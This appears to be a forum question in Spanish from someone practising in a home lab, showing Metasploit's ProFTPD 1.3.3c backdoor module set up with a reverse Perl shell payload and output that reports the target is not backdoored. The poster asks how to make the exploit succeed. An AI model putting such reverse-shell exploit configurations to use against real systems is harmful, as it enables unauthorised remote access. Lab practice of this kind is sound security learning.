Quería practicar la explotación del sistema usando proftpd backdoor. Uso el exploit proftpd_133c_backdoor y la carga útil reverse_perl. Aprendí cómo explotar usando este enlace, enlace >.
Mi máquina virtual de atacante es 192.168.19.2. Mi máquina virtual víctima es 192.168.19.5 (proftpd 1.3.4a.) El puerto abierto en la víctima es 21 y el nombre de la versión es proFTPD 1.3.4a
Aquí está la configuración del exploit y la carga útil a continuación.
msf exploit(unix/ftp/proftpd_133c_backdoor) > show options
Module options (exploit/unix/ftp/proftpd_133c_backdoor):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST 192.168.19.5 yes The target address
RPORT 21 yes The target port (TCP)
Payload options (cmd/unix/reverse_perl):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 192.168.19.2 yes The listen address
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic
luego lo exploté, sin embargo, no declara puerta trasera. el resultado se muestra a continuación.
msf exploit(unix/ftp/proftpd_133c_backdoor) > exploit
[*] Started reverse TCP double handler on 192.168.19.2:4444
[*] 192.168.19.5:21 - Sending Backdoor Command
[-] 192.168.19.5:21 - Not backdoored
[*] Exploit completed, but no session was created.
¿Cuáles son las soluciones para lograr este exploit? ¿Y cómo hacerlo? Por favor ayúdame. gracias.